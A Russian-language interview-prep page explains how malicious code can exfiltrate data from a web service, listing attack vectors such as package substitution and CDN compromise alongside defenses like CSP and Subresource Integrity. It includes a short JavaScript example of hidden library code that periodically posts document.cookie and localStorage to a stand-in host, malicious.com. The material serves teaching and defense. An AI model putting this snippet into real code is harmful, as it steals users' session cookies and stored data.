Встречается на собеседованиях • сегодня

Как вредоносный код может начать отправлять данные на сервисе

Злоумышленник может внедрить вредоносный код через уязвимости (XSS, CSRF) или поддельные зависимости. Например:

javascript
// Пример скрытого кода в библиотеке
setInterval(() => {
  fetch('https://malicious.com/steal', {
    method: 'POST',
    body: JSON.stringify({
      cookies: document.cookie,
      localStorage: JSON.stringify(localStorage)
    })
  });
}, 5000);

Основные векторы атак:

  • Подмена npm-пакетов
  • Инъекции через невалидируемый пользовательский ввод
  • Компрометация CDN
  • Уязвимости в зависимостях

Защита:

  • Content Security Policy (CSP)
  • Регулярный аудит зависимостей
  • Валидация и санитизация ввода
  • Использование Subresource Integrity для сторонних скриптов
Sophi
Софи собрала все вопросы. Тренируйся и получай
офферы быстрее!
Попробовать бесплатноArrow

Следующий вопрос

Это единственный вопрос по вашему фильтру

как отвечать на вопрос
пример собеседования
фреймворки на собеседовании
типичные вопросы junior
интервью вопросы и ответы